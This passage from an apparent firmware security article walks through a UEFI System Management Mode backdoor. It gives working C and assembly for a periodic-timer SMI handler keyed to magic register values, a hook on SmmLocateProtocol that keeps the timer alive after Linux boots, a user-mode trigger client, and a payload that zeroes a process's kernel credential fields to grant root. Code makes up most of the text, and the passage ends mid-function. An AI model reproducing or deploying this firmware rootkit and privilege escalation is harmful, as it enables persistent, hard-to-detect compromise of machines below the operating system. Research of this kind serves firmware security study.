        sizeof((_var_)), (_id_), gSmst->CurrentlyExecutingCpu, (PVOID)&(_var_));    \
                                                                                    \
    if (EFI_ERROR(Status))                                                          \
    {                                                                               \
        DbgMsg(__FILE__, __LINE__, "WriteSaveState() fails: 0x%X\r\n", Status);     \
        goto _end;                                                                  \
    }

#define MAX_JUMP_SIZE 6

EFI_STATUS EFIAPI PeriodicTimerDispatch2Handler(
    EFI_HANDLE DispatchHandle, CONST VOID *Context,
    VOID *CommBuffer, UINTN *CommBufferSize)
{
    EFI_STATUS Status = EFI_SUCCESS;   
    EFI_SMM_CPU_PROTOCOL *SmmCpu = NULL;    

    // obtain SMM CPU protocol 
    Status = gSmst->SmmLocateProtocol(&gEfiSmmCpuProtocolGuid, NULL, (PVOID *)&SmmCpu);
    if (Status == EFI_SUCCESS)
    {
        CONTROL_REGS ControlRegs;
        UINT64 Rax = 0, Rcx = 0, Rdx = 0, Rdi = 0, Rsi = 0, R8 = 0, R9 = 0;        

        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_CR0, ControlRegs.Cr0);
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_CR3, ControlRegs.Cr3);
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_CR4, ControlRegs.Cr4);
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RCX, Rcx); // user-mode instruction pointer
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RDI, Rdi); // 1-st param (code)
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RSI, Rsi); // 2-nd param (arg1)
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RDX, Rdx); // 3-rd param (arg2)
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_R8, R8); // 1-st magic constant
        READ_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_R9, R9); // 2-nd magic constant       

        /* 
            Check for magic values that was set in smm_call(),
            see smm_call/smm_call.asm for more info.
        */
        if (R8 == BACKDOOR_SMM_CALL_R8_VAL && R9 == BACKDOOR_SMM_CALL_R9_VAL)
        {            
            DbgMsg(
                __FILE__, __LINE__, 
                "smm_call(): CPU #%d, RDI = 0x%llx, RSI = 0x%llx, RDX = 0x%llx\r\n", 
                gSmst->CurrentlyExecutingCpu, Rdi, Rsi, Rdx
            );

            // handle backdoor control request
            // ...

            // set smm_call() return value
            WRITE_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RAX, Rax, Status);

            // let the code to exit from infinite loop
            WRITE_SAVE_STATE(EFI_SMM_SAVE_STATE_REGISTER_RCX, Rcx, Rcx - MAX_JUMP_SIZE);
        }
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "LocateProtocol() fails: 0x%X\r\n", Status);   
    }

_end:

    return EFI_SUCCESS;
}
//--------------------------------------------------------------------------------------
EFI_STATUS PeriodicTimerDispatch2Register(EFI_HANDLE *DispatchHandle)
{
    EFI_STATUS Status = EFI_INVALID_PARAMETER;  

    if (m_PeriodicTimerDispatch)
    {
        // register periodic timer routine
        Status = m_PeriodicTimerDispatch->Register(
            m_PeriodicTimerDispatch, 
            PeriodicTimerDispatch2Handler, 
            &m_PeriodicTimerDispatch2RegCtx,
            DispatchHandle
        );
        if (Status == EFI_SUCCESS)
        {
            DbgMsg(
                __FILE__, __LINE__, "SMM timer handler is at "FPTR"\r\n", 
                PeriodicTimerDispatch2Handler
            );
        }
        else
        {
            DbgMsg(__FILE__, __LINE__, "Register() fails: 0x%X\r\n", Status);
        }
    }    

    return Status;
}
//--------------------------------------------------------------------------------------
EFI_STATUS PeriodicTimerDispatch2Unregister(EFI_HANDLE DispatchHandle)
{
    EFI_STATUS Status = EFI_INVALID_PARAMETER;  

    if (m_PeriodicTimerDispatch)
    {
        // unregister periodic timer routine
        Status = m_PeriodicTimerDispatch->UnRegister(
            m_PeriodicTimerDispatch, 
            DispatchHandle
        );
        if (Status == EFI_SUCCESS)
        {
            DbgMsg(__FILE__, __LINE__, "SMM timer handler unregistered\r\n");
        }
        else
        {
            DbgMsg(__FILE__, __LINE__, "Unregister() fails: 0x%X\r\n", Status);
        }
    }    

    return Status;
}
//--------------------------------------------------------------------------------------
EFI_STATUS EFIAPI PeriodicTimerDispatch2ProtocolNotifyHandler(
    CONST EFI_GUID *Protocol, 
    VOID *Interface, 
    EFI_HANDLE Handle)
{
    EFI_STATUS Status = EFI_SUCCESS;   
    UINT64 *SmiTickInterval = NULL;

    // obtain target protocol
    m_PeriodicTimerDispatch = 
        (EFI_SMM_PERIODIC_TIMER_DISPATCH2_PROTOCOL *)Interface;   

    // enable periodic timer SMI
    PeriodicTimerDispatch2Register(&m_PeriodicTimerDispatchHandle);

    return EFI_SUCCESS;   
}
//--------------------------------------------------------------------------------------
VOID BackdoorEntrySmm(VOID)
{
    PVOID Registration = NULL;

    // ... skipped ...

    // register SMM protocol notification
    EFI_STATUS Status = gSmst->SmmRegisterProtocolNotify(
        &gEfiSmmPeriodicTimerDispatch2ProtocolGuid, 
        PeriodicTimerDispatch2ProtocolNotifyHandler, 
        &Registration
    );
    if (Status == EFI_SUCCESS)
    {
        DbgMsg(
            __FILE__, __LINE__, "SMM protocol notify handler is at "FPTR"\r\n",
            PeriodicTimerDispatch2ProtocolNotifyHandler
        );
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "RegisterProtocolNotify() fails: 0x%X\r\n", Status);
    }

    // ... skipped ...
}
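
The CONTROL_REGS structure above exists because the backdoor has to translate virtual addresses of the interrupted code by itself. The actual translation code is not shown in this article, so the following Python sketch is only an assumption of how such a walk can look: it handles 4-level (IA-32e) paging with 4 KB, 2 MB and 1 GB pages, takes physical memory access as a callback, and ignores permission bits and the CR0/CR4 mode checks.

```python
PRESENT = 1 << 0
PAGE_SIZE_BIT = 1 << 7          # PS flag: entry maps a large page
ADDR_MASK = 0x000FFFFFFFFFF000  # bits 12..51 of a paging-structure entry


def translate(read_qword, cr3, vaddr):
    """Translate vaddr using 4-level paging.

    read_qword(paddr) must return the 64-bit value at a physical address.
    Returns the physical address, or None if the mapping is not present.
    """
    table = cr3 & ADDR_MASK
    # (shift of the index field, size of a large page allowed at this level)
    levels = ((39, None), (30, 1 << 30), (21, 1 << 21), (12, None))

    for shift, large_size in levels:
        index = (vaddr >> shift) & 0x1FF
        entry = read_qword(table + index * 8)
        if not entry & PRESENT:
            return None
        if large_size and entry & PAGE_SIZE_BIT:
            base = entry & ADDR_MASK & ~(large_size - 1)
            return base | (vaddr & (large_size - 1))
        table = entry & ADDR_MASK

    # table now holds the 4 KB page frame address
    return table | (vaddr & 0xFFF)


# toy physical memory: address -> 64-bit value, unmapped reads return 0
mem = {}
read = lambda paddr: mem.get(paddr, 0)

cr3, vaddr = 0x1000, 0x00007F1234567ABC
index = lambda shift: (vaddr >> shift) & 0x1FF

mem[0x1000 + index(39) * 8] = 0x2000 | PRESENT      # PML4 entry
mem[0x2000 + index(30) * 8] = 0x3000 | PRESENT      # PDPT entry
mem[0x3000 + index(21) * 8] = 0x4000 | PRESENT      # PD entry
mem[0x4000 + index(12) * 8] = 0xABCDE000 | PRESENT  # PT entry

print(hex(translate(read, cr3, vaddr)))
```

In SMM the read_qword callback would simply dereference physical memory, since the handler can access it directly.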

When I started my board with this code for the first time, I found that the periodic timer initializes and works fine, but it stops generating SMIs while the operating system (64-bit Linux) loads. Such behaviour is easy to explain: during early boot the OS kernel overrides the APIC controller settings and apparently destroys the timer that was configured by the infected firmware. Because there is no easy or documented way to protect the APIC configuration from being changed by the operating system, we need to find a way to re-initialize the timer from SMM code at a later stage of kernel initialization.

I spent some time hooking and monitoring SMST functions and found that at a late stage of on-board hardware initialization my firmware calls the EFI_SMM_SYSTEM_TABLE2.SmmLocateProtocol() function to find a protocol with GUID = 3EF7500E-CF55-474F-8E7E-009E0EACECD2 (Google says that its internal vendor name is AMI_USB_SMM_PROTOCOL_GUID). Because the APIC has already been initialized by the kernel at this point, I implemented backdoor code that hooks EFI_SMM_SYSTEM_TABLE2.SmmLocateProtocol() and re-installs our periodic timer inside the hook handler function:
#define AMI_USB_SMM_PROTOCOL_GUID { 0x3ef7500e, 0xcf55, 0x474f, \
                                    { 0x8e, 0x7e, 0x00, 0x9e, 0x0e, 0xac, 0xec, 0xd2 }}

EFI_LOCATE_PROTOCOL old_SmmLocateProtocol = NULL;

EFI_STATUS EFIAPI new_SmmLocateProtocol(
    EFI_GUID *Protocol,
    VOID *Registration,
    VOID **Interface)
{        
    EFI_GUID TargetGuid = AMI_USB_SMM_PROTOCOL_GUID;

    /*
        Totally board-specific hack for Intel DQ77KB, SmmLocateProtocol
        with AMI_USB_SMM_PROTOCOL_GUID is being called during OS startup after
        APIC init, so, here we can register our SMI timer.
    */
    if (Protocol && !memcmp(Protocol, &TargetGuid, sizeof(TargetGuid)))
    {
        DbgMsg(__FILE__, __LINE__, __FUNCTION__"()\r\n");

        if (m_PeriodicTimerDispatchHandle)
        {
            // unregister previously registered timer
            PeriodicTimerDispatch2Unregister(m_PeriodicTimerDispatchHandle);
            m_PeriodicTimerDispatchHandle = NULL;
        }

        // enable periodic timer SMI again
        PeriodicTimerDispatch2Register(&m_PeriodicTimerDispatchHandle);

        // remove the hook
        gSmst->SmmLocateProtocol = old_SmmLocateProtocol;       
    }    

    // call original function
    return old_SmmLocateProtocol(Protocol, Registration, Interface);
}
//--------------------------------------------------------------------------------------
VOID BackdoorEntrySmm(VOID)
{
    PVOID Registration = NULL;

    // ... skipped ...

    // hook SmmLocateProtocol() SMST function to execute backdoor code during OS startup
    old_SmmLocateProtocol = gSmst->SmmLocateProtocol;
    gSmst->SmmLocateProtocol = new_SmmLocateProtocol;

    // ... skipped ...
}

Of course, such a dirty and totally board-specific hack is not very good for backdoor reliability, but it has no impact on platform stability and its code is not complicated at all. If you have any ideas on how to solve this APIC problem in a more portable way and let the timer settings survive the OS load, please let me know :)
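
The one-shot hook pattern used above can be tried outside of firmware. The following is only a user-space sketch under stated assumptions: SKETCH_GUID, SKETCH_TABLE, original_locate() and the counters are hypothetical stand-ins that I made up for illustration, not EDK2 types or anything from the backdoor source. It shows the three steps: save the original pointer, replace it, and restore it once the target GUID has been seen.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Simplified stand-ins for the UEFI types, NOT the real EDK2 definitions. */
typedef struct {
    unsigned int   Data1;
    unsigned short Data2;
    unsigned short Data3;
    unsigned char  Data4[8];
} SKETCH_GUID;

typedef int (*SKETCH_LOCATE)(const SKETCH_GUID *Protocol, void **Interface);

/* Plays the role of the SMST: a table of function pointers. */
typedef struct {
    SKETCH_LOCATE LocateProtocol;
} SKETCH_TABLE;

const SKETCH_GUID g_target_guid = {
    0x3ef7500e, 0xcf55, 0x474f,
    { 0x8e, 0x7e, 0x00, 0x9e, 0x0e, 0xac, 0xec, 0xd2 }
};

SKETCH_TABLE g_table;
SKETCH_LOCATE g_old_locate = NULL;
int g_rearm_count = 0;      /* times the "timer" was re-registered */
int g_original_calls = 0;   /* times the original service ran */

/* Hypothetical stand-in for the firmware's original service. */
int original_locate(const SKETCH_GUID *Protocol, void **Interface)
{
    (void)Protocol;
    if (Interface) *Interface = NULL;
    g_original_calls++;
    return 0;
}

int hooked_locate(const SKETCH_GUID *Protocol, void **Interface)
{
    /* keep the original pointer in a local, the hook may remove itself below */
    SKETCH_LOCATE next = g_old_locate;

    if (Protocol && memcmp(Protocol, &g_target_guid, sizeof(g_target_guid)) == 0)
    {
        g_rearm_count++;                 /* the real code re-registers the timer here */
        g_table.LocateProtocol = next;   /* one-shot: restore the original pointer */
    }

    /* always forward the call so the caller sees normal behaviour */
    return next(Protocol, Interface);
}

/* Reset the sketch state and point the table at the original service. */
void sketch_init(void)
{
    g_table.LocateProtocol = original_locate;
    g_old_locate = NULL;
    g_rearm_count = 0;
    g_original_calls = 0;
}

void install_hook(void)
{
    assert(g_table.LocateProtocol != NULL);
    g_old_locate = g_table.LocateProtocol;
    g_table.LocateProtocol = hooked_locate;
}
```

After sketch_init() and install_hook(), a call through g_table.LocateProtocol with an unrelated GUID leaves the hook in place, while the first call with g_target_guid bumps g_rearm_count and puts original_locate back into the table.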

Client code for this communication method is written in C and assembly. Before jumping into the infinite loop it calls the Linux sched_setaffinity() function to make sure that the scheduler runs our loop on the first CPU:
#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <inttypes.h>
#include <unistd.h>

// external function implemented in assembly
extern int smm_call(long code, unsigned long long arg1, unsigned long long arg2);

int main(int argc, char *argv[])
{
    int ret = 0;    
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(0, &mask);

    // tells to the scheduler to run current process only on first CPU
    ret = sched_setaffinity(0, sizeof(mask), &mask);
    if (ret != 0)
    {
        printf("sched_setaffinity() ERROR %d\n", errno);
        return errno; 
    }

    int code = 0;
    unsigned long long arg1 = 0, arg2 = 0;

    /*
        Parse arguments for SMM backdoor call from command line arguments.
    */

    if (argc >= 2)
    {
        if ((code = strtol(argv[1], NULL, 16)) == 0 && errno == EINVAL)
        {
            printf("strtol() ERROR %d\n", errno);
            return errno; 
        }
    }

    if (argc >= 3)
    {
        if ((arg1 = strtoull(argv[2], NULL, 16)) == 0 && errno == EINVAL)
        {
            printf("strtoull() ERROR %d\n", errno);
            return errno; 
        }
    }

    if (argc >= 4)
    {
        if ((arg2 = strtoull(argv[3], NULL, 16)) == 0 && errno == EINVAL)
        {
            printf("strtoull() ERROR %d\n", errno);
            return errno; 
        }
    }    

    printf(
        "Calling SMM backdoor with code = 0x%x and args 0x%llx, 0x%llx...\n", 
        code, arg1, arg2
    );

    /* 
        Jump to infinite loop to call SMM backdoor.
        If backdoor is not available - this function hangs forever.
    */
    ret = smm_call(code, arg1, arg2);

    printf("Success! Status code: 0x%.8x\n", ret);

    return ret;
}

Assembly part of client code:
BITS 64
GLOBAL smm_call

;
; Magic values that backdoor checks for.
;
%define R8_VAL 0x4141414141414141
%define R9_VAL 0x4242424242424242

;
; int smm_call(long code, unsigned long long arg1, unsigned long long arg2)
;
; Sends control request with specified code and argument to
; SMM backdoor.
;
; Returns EFI_STATUS of requested operation.
;
smm_call:

    push   rcx
    push   r8
    push   r9

    ; SMI timer handler checks R8 and R9 for these magic values
    mov    r8, R8_VAL
    mov    r9, R9_VAL

    xor    rax, rax
    dec    rax

    ; jump in infinite loop with RCX as instruction address
    mov    rcx, _loop
    jmp    rcx

    ; landing area for modified RCX value
    nop
    nop
    nop
    nop
    nop
    nop
    jmp    short _end

_loop:
    ;
    ; SMI timer handler will be called when process runs in 
    ; infinite loop with magic registers values. SMM backdoor 
    ; decrements RCX value (--> jmp _end) to exit from the loop.
    ; Code and Arg for SmmCallHandle() are going in RDI and RSI.
    ;
    nop
    jmp    rcx

_end:

    pop    r9
    pop    r8
    pop    rcx

    ; SMM backdoor returns status code in RAX register
    ret

The backdoor registers the periodic timer SMI handler automatically at startup, but it's also possible to ask the backdoor to enable or disable it at runtime using the SmmBackdoor.py program that was mentioned above:
  • SmmBackdoor.py --timer-enable — enable periodic timer SMI.
  • SmmBackdoor.py --timer-disable — disable periodic timer SMI.

More advanced payload example 


Now that we have SMM communication code that works from any privilege level, it is reasonable to improve the backdoor and write a payload that accepts a command from the attacker's user mode Linux process and gives it root privileges.

To get the credentials of the current process Linux uses the sys_getuid(), sys_geteuid(), sys_getgid() and sys_getegid() syscalls. Let's look at their assembly code, taking sys_getuid() as an example:
sys_getuid:

65 48 8b 04 25 00 c7 00 00     mov %gs:0xc700, %rax      ; get task_struct
48 8b 80 88 03 00 00           mov 0x388(%rax), %rax     ; get task_struct->cred
8b 40 04                       mov 0x4(%rax), %eax       ; get desired value from cred
c3                             retq

As you can see, the kernel gets the task_struct address of the current process via the GS segment and reads the current user and group information from the task_struct->cred->uid, task_struct->cred->euid, task_struct->cred->gid and task_struct->cred->egid fields.

The SMM backdoor code that modifies cred values from the SMI handler relies on their offsets, which may change across different builds and versions of the Linux kernel. To avoid a huge amount of OS-specific logic in the backdoor code, it receives the addresses of the sys_getuid(), sys_geteuid(), sys_getgid() and sys_getegid() kernel functions from the client and extracts the required field offsets from their binary code. To give a process root privileges, the backdoor just sets these fields to zero:
/* 
    Dispatch SMM backdoor command from SW SMI or periodic timer handler.
    Code, Arg1 and Arg2 usually come from CPU register values that were set by the backdoor client.
*/
EFI_STATUS SmmCallHandle(UINT64 Code, UINT64 Arg1, UINT64 Arg2, PCONTROL_REGS ControlRegs)
{
    EFI_STATUS Status = EFI_INVALID_PARAMETER;    

    switch (Code)
    {
    case BACKDOOR_PRIVESC:
        {
            UINT64 Addr = 0, GsBase = 0;
            int OffsetTaskStruct = 0, OffsetCred = 0;
            unsigned char OffsetCredVal = 0;

            if (Arg1 == 0)
            {
                DbgMsg(__FILE__, __LINE__, "ERROR: Arg1 must be specified\r\n");
                
                Status = EFI_INVALID_PARAMETER;
                goto _end;
            }

            // check that long mode paging is enabled
            if (!Check_IA_32e(ControlRegs))
            {
                DbgMsg(__FILE__, __LINE__, "ERROR: IA-32e paging is not enabled\r\n");
                
                Status = EFI_INVALID_PARAMETER;
                goto _end;
            }

            DbgMsg(__FILE__, __LINE__, "Syscall address is 0x%llx\r\n", Arg1);

            // get physical address of syscall
            if ((Status = VirtualToPhysical(Arg1, &Addr, ControlRegs->Cr3)) == EFI_SUCCESS)
            {                
                /*
                    The user mode program (smm_call) passes the sys_getuid/euid/gid/egid
                    function address in the 1st argument; we need to analyse its code
                    and get offsets to task_struct, cred and uid/euid/gid/egid fields.
                    Then we just set the field value to 0 (root).

                    sys_getuid code as example:

                        mov    %gs:0xc700, %rax   ; get task_struct
                        mov    0x388(%rax), %rax  ; get task_struct->cred
                        mov    0x4(%rax), %eax    ; get desired value from cred
                        retq
                */
                if (memcmp((void *)(Addr + 0x00), "\x65\x48\x8b\x04\x25", 5) ||
                    memcmp((void *)(Addr + 0x09), "\x48\x8b\x80", 3) ||
                    memcmp((void *)(Addr + 0x10), "\x8b\x40", 2))
                {
                    DbgMsg(__FILE__, __LINE__, "ERROR: Unexpected binary code\r\n");
                    
                    Status = EFI_INVALID_PARAMETER;
                    goto _end;
                }

                // get fields offsets
                OffsetCredVal = *(unsigned char *)(Addr + 0x12);
                OffsetTaskStruct = *(int *)(Addr + 0x05);
                OffsetCred = *(int *)(Addr + 0x0c);                

                DbgMsg(
                    __FILE__, __LINE__, 
                    "task_struct offset: 0x%x, cred offset: 0x%x, cred value offset: 0x%x\r\n",
                    OffsetTaskStruct, OffsetCred, OffsetCredVal
                );
            }
            else
            {
                DbgMsg(
                    __FILE__, __LINE__, 
                    "ERROR: Unable to resolve physical address for 0x%llx\r\n", Arg1
                );

                goto _end;
            }

            // get GS segment base address
            GsBase = __readmsr(IA32_KERNEL_GS_BASE);            

            DbgMsg(__FILE__, __LINE__, "GS base is 0x%llx\r\n", GsBase);

            // check if GS base points to user-mode
            if ((GsBase >> 63) == 0)
            {
                DbgMsg(__FILE__, __LINE__, "ERROR: Bad GS base\r\n");
                
                Status = EFI_INVALID_PARAMETER;
                goto _end;
            }            

            // get physical address of GS base
            if ((Status = VirtualToPhysical(GsBase, &Addr, ControlRegs->Cr3)) == EFI_SUCCESS)
            {                
                UINT64 TaskStruct = *(UINT64 *)(Addr + OffsetTaskStruct);   

                DbgMsg(__FILE__, __LINE__, "task_struct is at 0x%llx\r\n", TaskStruct);

                // get physical address of task_struct structure
                if ((Status = VirtualToPhysical(TaskStruct, &Addr, ControlRegs->Cr3)) == EFI_SUCCESS)
                {
                    UINT64 Cred = *(UINT64 *)(Addr + OffsetCred);   

                    DbgMsg(__FILE__, __LINE__, "cred is at 0x%llx\r\n", Cred);

                    // get physical address of task_struct->cred structure
                    if ((Status = VirtualToPhysical(Cred, &Addr, ControlRegs->Cr3)) == EFI_SUCCESS)
                    {
                        int *CredVal = (int *)(Addr + OffsetCredVal);

                        DbgMsg(
                            __FILE__, __LINE__, 
                            "Current cred value is %d (setting to 0)\r\n", *CredVal
                        );

                        // set root privileges
                        *CredVal = 0;
                    }
                    else
                    {
                        DbgMsg(
                            __FILE__, __LINE__, 
                            "ERROR: Unable to resolve physical address for 0x%llx\r\n", Cred
                        );
                    }
                }
                else
                {
                    DbgMsg(
                        __FILE__, __LINE__, 
                        "ERROR: Unable to resolve physical address for 0x%llx\r\n", TaskStruct
                    );
                }
            }
            else
            {
                DbgMsg(
                    __FILE__, __LINE__, 
                    "ERROR: Unable to resolve physical address for 0x%llx\r\n", GsBase
                );
            }
        }
    } 

_end:

    return Status;
}
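
The offset extraction step of SmmCallHandle() can be checked in user space against the sys_getuid() bytes listed earlier. This is a minimal sketch: GETTER_OFFSETS, read_le32() and parse_getter() are hypothetical names of my own, and the byte array is just the disassembly from the article typed in by hand. Displacements are assembled byte by byte, so the sketch does not depend on the host's endianness.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct {
    int32_t task_struct_off;  /* disp32 of: mov %gs:disp32, %rax   */
    int32_t cred_off;         /* disp32 of: mov disp32(%rax), %rax */
    uint8_t cred_val_off;     /* disp8 of:  mov disp8(%rax), %eax  */
} GETTER_OFFSETS;

/* Bytes of sys_getuid() exactly as shown in the listing above. */
const unsigned char SYS_GETUID_SAMPLE[] = {
    0x65, 0x48, 0x8b, 0x04, 0x25, 0x00, 0xc7, 0x00, 0x00,  /* +0x00 */
    0x48, 0x8b, 0x80, 0x88, 0x03, 0x00, 0x00,              /* +0x09 */
    0x8b, 0x40, 0x04,                                      /* +0x10 */
    0xc3                                                   /* +0x13 */
};

/* Read a little-endian 32-bit displacement from the instruction stream. */
int32_t read_le32(const unsigned char *p)
{
    uint32_t v = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                 ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);

    return (int32_t)v;
}

/* Returns 0 and fills *out on success, -1 if the code does not match. */
int parse_getter(const unsigned char *code, size_t len, GETTER_OFFSETS *out)
{
    assert(code != NULL && out != NULL);

    /* the last byte we read is the disp8 at +0x12 */
    if (len < 0x13)
    {
        return -1;
    }

    /* same opcode checks as in the backdoor code */
    if (memcmp(code + 0x00, "\x65\x48\x8b\x04\x25", 5) != 0 ||
        memcmp(code + 0x09, "\x48\x8b\x80", 3) != 0 ||
        memcmp(code + 0x10, "\x8b\x40", 2) != 0)
    {
        return -1;
    }

    out->task_struct_off = read_le32(code + 0x05);
    out->cred_off = read_le32(code + 0x0c);
    out->cred_val_off = code[0x12];

    return 0;
}
```

For the sample bytes this yields 0xc700, 0x388 and 0x4, the same three displacements that appear in the disassembly.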

Backdoor code that implements virtual to physical address translation for IA-32e (long mode) paging according to the Intel manuals:
#define PFN_TO_PAGE(_val_) ((_val_) << PAGE_SHIFT)
#define PAGE_TO_PFN(_val_) ((_val_) >> PAGE_SHIFT)

// get PML4 address from CR3 register value
#define PML4_ADDRESS(_val_) ((_val_) & 0xfffffffffffff000)

// get paging structure indexes from virtual address
#define PML4_INDEX(_addr_) (((_addr_) >> 39) & 0x1ff)
#define PDPT_INDEX(_addr_) (((_addr_) >> 30) & 0x1ff)
#define PDE_INDEX(_addr_) (((_addr_) >> 21) & 0x1ff)
#define PTE_INDEX(_addr_) (((_addr_) >> 12) & 0x1ff)

#define PAGE_OFFSET_4K(_addr_) ((_addr_) & 0xfff)
#define PAGE_OFFSET_2M(_addr_) ((_addr_) & 0x1fffff)

// PS flag of PDPTE and PDE
#define PDPTE_PDE_PS 0x80

#define INTERLOCKED_GET(_addr_) InterlockedCompareExchange64((UINT64 *)(_addr_), 0, 0)

BOOLEAN Check_IA_32e(PCONTROL_REGS ControlRegs)
{
    UINT64 Efer = __readmsr(IA32_EFER);

    /*
        Check that the supported IA-32e (long mode) memory translation mechanisms 
        were enabled when the SMI occurred.
    */
    if (!(ControlRegs->Cr0 & CR0_PG))
    {
        DbgMsg(__FILE__, __LINE__, "ERROR: CR0.PG is not set\r\n");
        return FALSE;   
    }

    if (!(ControlRegs->Cr4 & CR4_PAE))
    {
        DbgMsg(__FILE__, __LINE__, "ERROR: CR4.PAE is not set\r\n");
        return FALSE;   
    }

    if (!(Efer & IA32_EFER_LME))
    {
        DbgMsg(__FILE__, __LINE__, "ERROR: IA32_EFER.LME is not set\r\n");
        return FALSE;
    }

    return TRUE;
}
//--------------------------------------------------------------------------------------
EFI_STATUS VirtualToPhysical(UINT64 Addr, UINT64 *Ret, UINT64 Cr3)
{
    UINT64 PhysAddr = 0;
    EFI_STATUS Status = EFI_INVALID_PARAMETER;    

    X64_PAGE_MAP_AND_DIRECTORY_POINTER_2MB_4K PML4Entry;    

    DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): CR3 is 0x%llx, VA is 0x%llx\r\n", Cr3, Addr);

    // get PML4 table entry of given virtual address
    PML4Entry.Uint64 = INTERLOCKED_GET(PML4_ADDRESS(Cr3) + PML4_INDEX(Addr) * sizeof(UINT64));

    DbgMsg(
        __FILE__, __LINE__, "PML4E is at 0x%llx[0x%llx]: 0x%llx\r\n", 
        PML4_ADDRESS(Cr3), PML4_INDEX(Addr), PML4Entry.Uint64
    );

    // check that entry is present
    if (PML4Entry.Bits.Present)
    {
        X64_PAGE_MAP_AND_DIRECTORY_POINTER_2MB_4K PDPTEntry;

        // get PDPTE of given virtual address
        PDPTEntry.Uint64 = INTERLOCKED_GET(PFN_TO_PAGE(PML4Entry.Bits.PageTableBaseAddress) + 
                                           PDPT_INDEX(Addr) * sizeof(UINT64));

        DbgMsg(
            __FILE__, __LINE__, "PDPTE is at 0x%llx[0x%llx]: 0x%llx\r\n", 
            PFN_TO_PAGE(PML4Entry.Bits.PageTableBaseAddress),
            PDPT_INDEX(Addr), PDPTEntry.Uint64
        );
 
        // check that entry is present
        if (PDPTEntry.Bits.Present)
        {
            // check for page size flag
            if ((PDPTEntry.Uint64 & PDPTE_PDE_PS) == 0)
            {
                X64_PAGE_DIRECTORY_ENTRY_4K PDEntry;

                // get PDE of given virtual address for less than 1Gbyte pages
                PDEntry.Uint64 = INTERLOCKED_GET(PFN_TO_PAGE(PDPTEntry.Bits.PageTableBaseAddress) +
                                                 PDE_INDEX(Addr) * sizeof(UINT64));

                DbgMsg(
                    __FILE__, __LINE__, "PDE is at 0x%llx[0x%llx]: 0x%llx\r\n", 
                    PFN_TO_PAGE(PDPTEntry.Bits.PageTableBaseAddress), PDE_INDEX(Addr), 
                    PDEntry.Uint64
                );

                // check that entry is present
                if (PDEntry.Bits.Present)
                {
                    // check for page size flag
                    if ((PDEntry.Uint64 & PDPTE_PDE_PS) == 0)
                    {
                        X64_PAGE_TABLE_ENTRY_4K PTEntry;

                        // get PTE of given virtual address for 4Kbyte pages
                        PTEntry.Uint64 = INTERLOCKED_GET(PFN_TO_PAGE(PDEntry.Bits.PageTableBaseAddress) +
                                                         PTE_INDEX(Addr) * sizeof(UINT64));

                        DbgMsg(
                            __FILE__, __LINE__, "PTE is at 0x%llx[0x%llx]: 0x%llx\r\n", 
                            PFN_TO_PAGE(PDEntry.Bits.PageTableBaseAddress), PTE_INDEX(Addr), 
                            PTEntry.Uint64
                        );

                        // check that entry is present
                        if (PTEntry.Bits.Present)
                        {
                            // get desired physical address
                            PhysAddr = PFN_TO_PAGE(PTEntry.Bits.PageTableBaseAddress) +
                                       PAGE_OFFSET_4K(Addr);

                            Status = EFI_SUCCESS;
                        }
                        else
                        {
                            DbgMsg(
                                __FILE__, __LINE__, 
                                "ERROR: PTE for 0x%llx is not present\r\n", Addr
                            );
                        }
                    }
                    else
                    {
                        // get desired physical address for 2Mbyte pages
                        PhysAddr = PFN_TO_PAGE(PDEntry.Bits.PageTableBaseAddress) +
                                   PAGE_OFFSET_2M(Addr);

                        Status = EFI_SUCCESS;
                    }
                }
                else
                {
                    DbgMsg(
                        __FILE__, __LINE__, 
                        "ERROR: PDE for 0x%llx is not present\r\n", Addr
                    );
                }                     
            }
            else
            {
                DbgMsg(__FILE__, __LINE__, "ERROR: 1Gbyte page\r\n");
            }
        }
        else
        {
            DbgMsg(__FILE__, __LINE__, "ERROR: PDPTE for 0x%llx is not present\r\n", Addr);
        }
    }
    else
    {
        DbgMsg(__FILE__, __LINE__, "ERROR: PML4E for 0x%llx is not present\r\n", Addr);
    }

    if (Status == EFI_SUCCESS)
    {
        DbgMsg(__FILE__, __LINE__, "Physical address of 0x%llx is 0x%llx\r\n", Addr, PhysAddr);

        if (Ret)
        {            
            // return resolved physical address to caller
            *Ret = PhysAddr;
        }
    }

    return Status;
}

Here's the updated client code that gets the required syscall function addresses from the /proc/kallsyms pseudo-file and calls the backdoor via smm_call() with the privilege escalation command number as an argument:
#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <inttypes.h>
#include <unistd.h>

#define MAX_COMMAND_LEN 0x200

// backdoor command number
#define BACKDOOR_PRIVESC 8 

// external function implemented in assembly
extern int smm_call(long code, unsigned long long arg1, unsigned long long arg2);

int main(int argc, char *argv[])
{
    int ret = 0;    
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(0, &mask);

    ret = sched_setaffinity(0, sizeof(mask), &mask);
    if (ret != 0)
    {
        printf("sched_setaffinity() ERROR %d\n", errno);
        return errno; 
    }

    if (argc >= 2 && !strcmp(argv[1], "--privesc"))
    {
        if (argc >= 3)
        {
            int i = 0;            

            for (i = 2; i < argc; i += 2)
            {
                unsigned long long addr = 0;
                char *func = argv[i + 1];
 
                // parse syscall address that was passed to the program by itself using cat + grep
                if ((addr = strtoull(argv[i], NULL, 16)) == 0 && errno == EINVAL)
                {
